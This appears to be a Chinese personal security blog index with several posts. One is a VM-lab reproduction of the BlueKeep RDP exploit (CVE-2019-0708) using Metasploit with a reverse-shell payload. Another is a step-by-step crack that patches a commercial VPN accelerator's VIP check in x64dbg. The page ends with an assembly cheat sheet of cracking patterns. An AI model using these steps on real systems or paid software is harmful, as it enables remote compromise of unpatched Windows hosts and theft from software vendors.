<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// List of domains bind to your WorkersProxy.</span></span><br><span class="line"><span class="keyword">const</span> domain_list = [<span class="string">'https://你的cloudflareWorker应用地址/'</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users.</span></span><br><span class="line"><span class="keyword">const</span> upstream = <span class="string">'https://www.baidu.com/'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users using mobile devices.</span></span><br><span class="line"><span class="keyword">const</span> upstream_mobile = <span class="string">'https://https://www.baidu.com/'</span></span><br></pre></td></tr></table></figure>
<p>ok,访问试一试,完全正常。</p>
</div>
<div class="article-info article-info-index">
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-复现cve-2019-0708" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/09/08/%E5%A4%8D%E7%8E%B0cve-2019-0708/" class="article-date">
<time datetime="2019-09-08T13:37:17.000Z" itemprop="datePublished">2019-09-08</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/09/08/%E5%A4%8D%E7%8E%B0cve-2019-0708/">复现cve-2019-0708</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>前几天从公众号看到了cve-2019-0708 poc 非蓝屏poc发布出来了,遂跟着复现一下。</p>
<p>具体地址忘记了,就百度了一个 <a target="_blank" rel="noopener" href="https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961">blog</a> 大家随便看看</p>
<h4 id="好了开始"><a href="#好了开始" class="headerlink" title="好了开始"></a>好了开始</h4><p>先给出 <a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0">poc地址 </a> </p>
<p>环境:vm 15</p>
<p>kali 最新版 ,win7 sp1 企业版(关闭防火墙,开启远程桌面服务)</p>
<ol>
<li><p>下载msf 需要替换和添加的rb脚本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb</span><br><span class="line">wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb</span><br></pre></td></tr></table></figure></li>
<li><p>替换原msf里部分rb脚本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb</span><br><span class="line">rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb</span><br><span class="line">cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb</span><br><span class="line">cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb</span><br></pre></td></tr></table></figure></li>
</ol>
<blockquote>
<blockquote>
<blockquote>
<p>这里强调一下,要把msf原有替换的rb脚本最好备份一下。</p>
</blockquote>
</blockquote>
</blockquote>
<ol start="3">
<li><p>进入 msfconsole</p>
<p><img src="/resources/1567961143191.png" alt="1567961143191"></p>
</li>
<li><p>重载模块reload_all</p>
<p><img src="/resources/1567961179580.png" alt="1567961179580"></p>
</li>
<li><p>搜索cve_2019_0708_bluekeep_rce这个模块,关键词可以选择bluekeep或者0708</p>
<p><img src="/resources/1567961283984.png" alt="1567961283984"></p>
</li>
<li><p>使用这个exp,并查看相关信息</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/rdp/cve_2019_0708_bluekeep_rce</span><br><span class="line">show options</span><br><span class="line">show info</span><br></pre></td></tr></table></figure>
<p><img src="/resources/1567961479827.png" alt="1567961479827"></p>
</li>
<li><p>设置rhosts ip (其实就是被攻击的ip即win7的),设置目标系统,目标系统有5个选项,可以根据实际情况来选,我这里的win7 是vm的虚拟机,所以选择3</p>
<p><img src="/resources/1567961784177.png" alt="1567961784177"></p>
<p><img src="/resources/1567961812168.png" alt="1567961812168"></p>
</li>
<li><p>设置payload及LHOST(反弹回连的ip即kali的ip)</p>
<p><code>set payload windows/x64/shell/reverse_tcp</code></p>
<p><img src="/resources/1567962053039.png" alt="1567962053039"></p>
<p><img src="/resources/1567962147797.png" alt="1567962147797"></p>
</li>
<li><p>再次运行一次options 看看设置参数</p>
<p><img src="/resources/1567962312957.png" alt="1567962312957"></p>
</li>
<li><p>check检查下看看(其实也可以不用这一步,直接允许exploit或者run也可以)</p>
<p><img src="/resources/1567962415464.png" alt="1567962415464"></p>
</li>
<li><p>看到提示了,表示有漏洞,可以进行下一步</p>
<p><img src="/resources/1567962597512.png" alt="1567962597512"></p>
</li>
<li><p>至此,成功复现,注意win7版本,sp1 7601 不能是家庭版。</p>
</li>
</ol>
<blockquote>
<blockquote>
<blockquote>
<p><img src="/resources/1567962697425.png" alt="1567962697425"></p>
</blockquote>
</blockquote>
</blockquote>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/poc/">poc</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/0708/" rel="tag">0708</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/bluekeep/" rel="tag">bluekeep</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/cve-2019-0708/" rel="tag">cve-2019-0708</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-ired-team" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/05/04/ired-team/" class="article-date">
<time datetime="2019-05-04T06:54:12.000Z" itemprop="datePublished">2019-05-04</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/05/04/ired-team/">ired team</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<h4 id="废话不多说直接介绍网站吧"><a href="#废话不多说直接介绍网站吧" class="headerlink" title="废话不多说直接介绍网站吧"></a>废话不多说直接介绍网站吧</h4><p>This is publicly accessible personal notes at <a target="_blank" rel="noopener" href="https://ired.team/">https://ired.team</a> about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries.</p>
<p>里面有许多好的红队资源。。</p>
<p>如下图:</p>
<p><img src="/resources/1556953062622.png" alt="1556953062622"></p>
<p>网址:<a target="_blank" rel="noopener" href="https://ired.team/">https://ired.team/</a></p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/redteam/">redteam</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pentesting-Cheatsheets/" rel="tag">Pentesting Cheatsheets</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/good-Cheatsheets/" rel="tag">good Cheatsheets</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/red/" rel="tag">red</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/redteam/" rel="tag">redteam</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-crack-xx加速器" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/05/02/crack-xx%E5%8A%A0%E9%80%9F%E5%99%A8/" class="article-date">
<time datetime="2019-05-02T09:40:19.000Z" itemprop="datePublished">2019-05-02</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/05/02/crack-xx%E5%8A%A0%E9%80%9F%E5%99%A8/">crack xx加速器</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>从52破解看到的 《<a target="_blank" rel="noopener" href="https://www.52pojie.cn/thread-944943-1-1.html"><strong>某某某加速器第二期破解教程</strong></a>》,自己也跟着视频走了下,原作者用的od,我不会od,就用x64dbg试一试(说实话,我也不懂x64dbg)。</p>
<p>好了开始,我们从官网下载下载软件,发现更新了,5.1日更新。。不知道到时候能不能用视频里的方法搞一搞。</p>
<h2 id="1-开始"><a href="#1-开始" class="headerlink" title="1.开始"></a>1.开始</h2><h4 id="1-1查壳"><a href="#1-1查壳" class="headerlink" title="1.1查壳"></a>1.1查壳</h4><p>用Exeinfo pe 查到 是 Themida & WinLicense 2.0 - 2.4.6(新手一脸懵逼),去吾爱也找不到好的自动脱壳工具。故继续搞、、、</p>
<p><img src="/resources/1556790795407.png" alt="1556790795407"></p>
<h4 id="1-2x64dbg加载"><a href="#1-2x64dbg加载" class="headerlink" title="1.2x64dbg加载"></a>1.2x64dbg加载</h4><p>加载后系统自动断点</p>
<blockquote>
<p>需要用管理员权限打开x32dbg</p>
</blockquote>
<p><img src="/resources/1556791071954.png" alt="1556791071954"></p>
<h4 id="1-3不用管,一直按f9-直到程序正常运行。"><a href="#1-3不用管,一直按f9-直到程序正常运行。" class="headerlink" title="1.3不用管,一直按f9 直到程序正常运行。"></a>1.3不用管,一直按f9 直到程序正常运行。</h4><blockquote>
<p>这个需要软件需要注册才能登录使用,也仅仅验证了注册登录,对是否为vip或者过期时间未进行二次验证。还有就是默认注册用户是有20分钟的无限使用时间。(登录后,等20分钟过期后在进行crack,要不然不会出现购买vip提示。vip提示为关键字,需要进行搜索)</p>
</blockquote>
<p>就是这样,如下图</p>
<p><img src="/resources/1556791340130.png" alt="1556791340130"></p>
<h4 id="1-4接下来,我们点击日本任意一个线路,就会提示购买vip"><a href="#1-4接下来,我们点击日本任意一个线路,就会提示购买vip" class="headerlink" title="1.4接下来,我们点击日本任意一个线路,就会提示购买vip"></a>1.4接下来,我们点击日本任意一个线路,就会提示购买vip</h4><p><img src="/resources/1556791543160.png" alt="1556791543160"></p>
<h4 id="1-5点击否,然后去x64dbg进行所有模块字符串搜索"><a href="#1-5点击否,然后去x64dbg进行所有模块字符串搜索" class="headerlink" title="1.5点击否,然后去x64dbg进行所有模块字符串搜索"></a>1.5点击否,然后去x64dbg进行所有模块字符串搜索</h4><p><img src="/resources/1556792042421.png" alt="1556792042421"></p>
<p>速度较慢,估计需要10来秒的时间,此时可以喝杯水。</p>
<p><img src="/resources/1556792281345.png" alt="1556792281345"></p>
<h4 id="1-6搜索VIP,然后双击”S-MR-NV”-L”当前为VIP节点-是否购买VIP套餐-”前面的地址进行跳转"><a href="#1-6搜索VIP,然后双击”S-MR-NV”-L”当前为VIP节点-是否购买VIP套餐-”前面的地址进行跳转" class="headerlink" title="1.6搜索VIP,然后双击”S_MR:NV”==L”当前为VIP节点,是否购买VIP套餐?”前面的地址进行跳转"></a>1.6搜索VIP,然后双击”S_MR:NV”==L”当前为VIP节点,是否购买VIP套餐?”前面的地址进行跳转</h4><p><img src="/resources/1556792563983.png" alt="1556792563983"></p>
<h4 id="1-7F2断点,然后修改箭头指向的jne使其跳转。在内存窗口中转到选定的地址。然后双击85,提示修改。"><a href="#1-7F2断点,然后修改箭头指向的jne使其跳转。在内存窗口中转到选定的地址。然后双击85,提示修改。" class="headerlink" title="1.7F2断点,然后修改箭头指向的jne使其跳转。在内存窗口中转到选定的地址。然后双击85,提示修改。"></a>1.7F2断点,然后修改箭头指向的jne使其跳转。在内存窗口中转到选定的地址。然后双击85,提示修改。</h4><p><img src="/resources/1556792755002.png" alt="1556792755002"></p>
<h3 id="2-开始crack"><a href="#2-开始crack" class="headerlink" title="2.开始crack"></a>2.开始crack</h3><h4 id="2-1还记得上一篇文章说过,85变84。"><a href="#2-1还记得上一篇文章说过,85变84。" class="headerlink" title="2.1还记得上一篇文章说过,85变84。"></a>2.1还记得上一篇文章说过,85变84。</h4><p><img src="/resources/1556792884637.png" alt="1556792884637"></p>
<h4 id="2-2打开程序,继续点击链接,x64dbg一路-F9"><a href="#2-2打开程序,继续点击链接,x64dbg一路-F9" class="headerlink" title="2.2打开程序,继续点击链接,x64dbg一路 F9"></a>2.2打开程序,继续点击链接,x64dbg一路 F9</h4><p><img src="/resources/1556793024789.png" alt="1556793024789"></p>
<h4 id="2-3然后,神器的事发生了。如图:"><a href="#2-3然后,神器的事发生了。如图:" class="headerlink" title="2.3然后,神器的事发生了。如图:"></a>2.3然后,神器的事发生了。如图:</h4><p><img src="/resources/1556793153186.png" alt="1556793153186"></p>
<h3 id="3-开始进行打补丁"><a href="#3-开始进行打补丁" class="headerlink" title="3.开始进行打补丁"></a>3.开始进行打补丁</h3><h4 id="3-1我用飘云阁的-PYG-Loader1-0-0-2-内存补丁工具进行patch。"><a href="#3-1我用飘云阁的-PYG-Loader1-0-0-2-内存补丁工具进行patch。" class="headerlink" title="3.1我用飘云阁的 PYG_Loader1.0.0.2 内存补丁工具进行patch。"></a>3.1我用飘云阁的 PYG_Loader1.0.0.2 内存补丁工具进行patch。</h4><p><img src="/resources/1556793769942.png" alt="1556793769942"></p>
<h4 id="3-2按照上面的步骤一次填写相关信息。"><a href="#3-2按照上面的步骤一次填写相关信息。" class="headerlink" title="3.2按照上面的步骤一次填写相关信息。"></a>3.2按照上面的步骤一次填写相关信息。</h4><p>补丁地址那一栏为当初截图里说的重要跳,需要跳转的那个地址。</p>
<p>85 改 84。 基址为程序的开始地址,可以去x64dbg符号里,找到程序的基址。</p>
<p>然后生成。进行补丁测试。</p>
<p>成功的图就不放了。以后发文章只会发核心图,这次图太多拉。。</p>
<p>/(ㄒoㄒ)/~~</p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/crack/">crack</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/789/" rel="tag">789</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/V-p-n/" rel="tag">V(*)p(*)n</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/crack/" rel="tag">crack</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-crack常用命令" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/05/02/crack%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/" class="article-date">
<time datetime="2019-05-02T08:47:32.000Z" itemprop="datePublished">2019-05-02</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/05/02/crack%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/">crack常用命令</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br></pre></td><td class="code"><pre><span class="line">软件破解常用汇编指令 </span><br><span class="line"> cmp a,b // 比较a与b</span><br><span class="line"> mov a,b // 把b值送给a值,使a=b</span><br><span class="line"> ret</span><br><span class="line">// 返回主程序</span><br><span class="line"> nop</span><br><span class="line">// 无作用</span><br><span class="line"> call</span><br><span class="line">// 调用子程序,子程序以ret结尾</span><br><span class="line"> je或jz</span><br><span class="line">// 相等则跳(机器码是74或84)</span><br><span class="line"> jne或jnz // 不相等则跳(机器码是75或85)</span><br><span class="line"> jmp</span><br><span class="line">// 无条件跳(机器码是EB)</span><br><span class="line"> jb</span><br><span class="line">// 若小于则跳</span><br><span class="line"> ja</span><br><span class="line">// 若大于则跳</span><br><span class="line"> jg</span><br><span class="line">// 若大于则跳</span><br><span class="line"> jge</span><br><span class="line">// 若大于等于则跳</span><br><span class="line"> jl</span><br><span class="line">// 若小于则跳</span><br><span class="line"> pop xxx // xxx出栈</span><br><span class="line"> push xxx // xxx压栈</span><br><span class="line"> ★★破解经典句式★★</span><br><span class="line">1.(最常用)</span><br><span class="line"> mov eax [ ] 方括号中填数字或代表数值的已定义的名称</span><br><span class="line"> mov edx [ ] </span><br><span class="line"> call 00?????? 关键call</span><br><span class="line"> test eax eax </span><br><span class="line"> jz(jnz)或 jne(je) 关键跳转</span><br><span class="line">2 (最常用)</span><br><span class="line"> mov eax [ ]</span><br><span class="line"> mov edx [ ]</span><br><span class="line"> call 00?????? 关键call</span><br><span class="line"> jne(je)</span><br><span class="line">关键跳转</span><br><span class="line">3</span><br><span class="line"> mov eax [ ]</span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line"> mov edx [ ]</span><br><span class="line"> cmp eax,edx</span><br><span class="line"> jnz(jz)</span><br><span class="line">4</span><br><span class="line"> lea edi [ ]</span><br><span class="line"> lea esi [ ]</span><br><span class="line"> repz cmpsd</span><br><span class="line"> jz(jnz)</span><br><span class="line">5</span><br><span class="line"> mov eax [ ]</span><br><span class="line"> mov edx [ ]</span><br><span class="line"> call 00??????</span><br><span class="line"> setz (setnz) al (bl,cl...)</span><br><span class="line">6</span><br><span class="line"> mov eax [ ] </span><br><span class="line"> mov edx [ ] </span><br><span class="line"> call 00??????</span><br><span class="line"> test eax eax</span><br><span class="line"> setz (setnz) bl,cl...</span><br><span class="line">7</span><br><span class="line"> call 00?????? ***</span><br><span class="line"> push eax (ebx,ecx...)</span><br><span class="line"> ......</span><br><span class="line"> ......</span><br><span class="line"> call 00??????</span><br><span class="line"> pop eax (ebx,ecx...)</span><br><span class="line"> test eax eax</span><br><span class="line"> jz(jnz)</span><br><span class="line">一、数据传输指令 </span><br><span class="line"> 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">1. 通用数据传送指令.</span><br><span class="line">MOV 传送字或字节. (mov ax 2把2放入寄存器)</span><br><span class="line">MOVSX 先符号扩展,再传送. </span><br><span class="line">MOVZX 先零扩展,再传送. </span><br><span class="line">PUSH 把字压入堆栈. </span><br><span class="line">POP 把字弹出堆栈. </span><br><span class="line">PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈. </span><br><span class="line">POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈. </span><br><span class="line">PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈. </span><br><span class="line">POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈. </span><br><span class="line">BSWAP 交换32位寄存器里字节的顺序 </span><br><span class="line">XCHG 交换字或字节.( 至少有一个操作数为寄存器,段寄存器不可作为操作数) </span><br><span class="line">CMPXCHG 比较并交换操作数.( 第二个操作数必须为累加器AL/AX/EAX ) </span><br><span class="line">XADD 先交换再累加.( 结果在第一个操作数里 ) </span><br><span class="line">XLAT 字节查表转换. </span><br><span class="line">── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即 </span><br><span class="line">0-FFH); 返回 AL 为查表结果. ( [BX+AL]->AL ) </span><br><span class="line">2. 输入输出端口传送指令.</span><br><span class="line">IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX} ) </span><br><span class="line">OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 ) </span><br><span class="line">输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时, </span><br><span class="line">其范围是 0-65535. </span><br><span class="line">3. 目的地址传送指令.</span><br><span class="line">LEA 装入有效地址. </span><br><span class="line">例: LEA DX,string ;把偏移地址存到DX. </span><br><span class="line">LDS 传送目标指针,把指针内容装入DS. </span><br><span class="line">例: LDS SI,string ;把段地址:偏移地址存到DS:SI. </span><br><span class="line">LES 传送目标指针,把指针内容装入ES. </span><br><span class="line">例: LES DI,string ;把段地址:偏移地址存到ES:DI. </span><br><span class="line">LFS 传送目标指针,把指针内容装入FS. </span><br><span class="line">例: LFS DI,string ;把段地址:偏移地址存到FS:DI. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">LGS 传送目标指针,把指针内容装入GS. </span><br><span class="line">例: LGS DI,string ;把段地址:偏移地址存到GS:DI. </span><br><span class="line">LSS 传送目标指针,把指针内容装入SS. </span><br><span class="line">例: LSS DI,string ;把段地址:偏移地址存到SS:DI. </span><br><span class="line">4. 标志传送指令.</span><br><span class="line">LAHF 标志寄存器传送,把标志装入AH. </span><br><span class="line">SAHF 标志寄存器传送,把AH内容装入标志寄存器. </span><br><span class="line">PUSHF/PUSHFD 将EFLAGS压入栈.</span><br><span class="line">操作码</span><br><span class="line">指令 </span><br><span class="line">说明 </span><br><span class="line">9C </span><br><span class="line">PUSHF 压入EFLAGS的低16位</span><br><span class="line">9C PUSHFD 压入EFLAGS </span><br><span class="line">POPF 标志出栈. </span><br><span class="line">PUSHD 32位标志入栈. </span><br><span class="line">POPD 32位标志出栈. </span><br><span class="line">二、算术运算指令 </span><br><span class="line"> ADD 加法. (add ax ax表示乘以ax的初始值)</span><br><span class="line">ADC 带进位加法. </span><br><span class="line">INC 加 1. </span><br><span class="line">AAA 加法的ASCII码调整. </span><br><span class="line">DAA 